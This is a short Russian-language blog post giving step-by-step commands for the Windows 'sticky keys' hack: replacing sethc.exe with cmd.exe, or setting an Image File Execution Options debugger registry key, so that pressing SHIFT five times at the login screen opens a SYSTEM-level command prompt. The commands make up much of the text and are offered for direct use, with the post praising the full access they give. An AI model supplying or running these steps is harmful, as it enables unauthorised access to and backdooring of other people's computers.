Методика подмены файл следующая (если система установлена в другой раздел, отличный от C:, подкорректируйте команды):
Сделаем резервную копию файла, скопировав его в корень диска C:
copy c:\windows\system32\sethc.exe c:\
Заменим файл sethc.exe файлом командной строки,
copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
Еще один способ применения хака – установка отладчика для sethc.exe, это можно сделать командой:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
Затем перезагружаем систему и на экране входа в Windows пять раз нажимаем клавишу SHIFT, в результате чего запускается окно командной строки, которым мы заменили программу sethc.exe. Вся прелесть в том, что командная строка запускается с правами SYSTEM, тем самым мы получаем полный доступ к компьютеру и можем запустить что угодно, хоть оболочку Explorer!
Комментариев нет:
Отправить комментарий